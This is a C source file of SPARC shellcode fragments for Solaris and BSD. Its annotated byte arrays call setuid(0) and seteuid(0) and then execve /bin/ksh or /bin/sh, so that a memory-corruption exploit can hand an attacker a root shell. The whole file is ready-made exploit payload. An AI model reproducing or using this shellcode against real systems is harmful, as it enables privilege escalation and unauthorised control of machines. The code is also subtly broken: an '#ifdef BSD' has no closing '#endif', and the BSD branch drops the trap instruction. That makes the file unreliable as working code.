/* * SPARC Shellcode fragments to set privs and exec a shell. * Runs on Solaris, NetBSD, OpenBSD, maybe others. * * -ghandi */ char nop[] = "\x82\x24\xa0\x05"; /* * Call setuid(0); */ char setuid_code[] = "\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */ "\x82\x10\x20\x17" /* mov 23, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ ; /* * Call seteuid(0); */ char seteuid_code[] = "\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */ #ifdef BSD "\x82\x10\x20\xb7" /* mov 183, %g1 */ #else "\x82\x10\x20\x8d" /* mov 141, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ ; /* * Call execve("/bin/ksh", {"/bin/ksh", NULL}, NULL); */ char execve_binksh[] = "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */ "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */ "\x23\x0b\xda\xdc" /* sethi %hi(0x2f6b7000), %l1 */ "\xa2\x14\x63\x68" /* or %l1, 0x368, %l1 ! 0x2f6b7368 */ "\xe0\x3b\xbf\xe8" /* std %l0, [%sp - 24] */ "\xc0\x23\xbf\xf0" /* st %g0, [%sp - 16] */ "\x90\x23\xa0\x18" /* sub %sp, 24, %o0 */ "\x92\x1b\x80\x0e" /* xor %sp, %sp, %o1 */ "\xd0\x3b\xbf\xf8" /* std %o0, [%sp - 8] */ "\x92\x23\xa0\x08" /* sub %sp, 8, %o1 */ "\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */ "\x82\x10\x20\x3b" /* mov 59, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ ; /* * Call execve("/bin/sh", {"/bin/sh", NULL}, NULL); */ char execve_binsh[] = "\x21\x0b\xd8\x9a" /* sethi 0x2f626800, %l0 */ "\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */ "\x23\x0b\xdc\xda" /* sethi 0x2f736800, %l1 */ "\xe0\x3b\xbf\xf0" /* std %l0, [%sp - 16] */ "\x90\x23\xa0\x10" /* sub %sp, 16, %o0 */ "\x92\x1b\x80\x0e" /* xor %sp, %sp, %o1 */ "\xd0\x3b\xbf\xf8" /* std %o0, [%sp - 8] */ "\x92\x23\xa0\x08" /* sub %sp, 8, %o1 */ "\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */ "\x82\x10\x20\x3b" /* mov 59, %g1 */ "\x91\xd0\x20\x08" /* ta 0x8 */ ;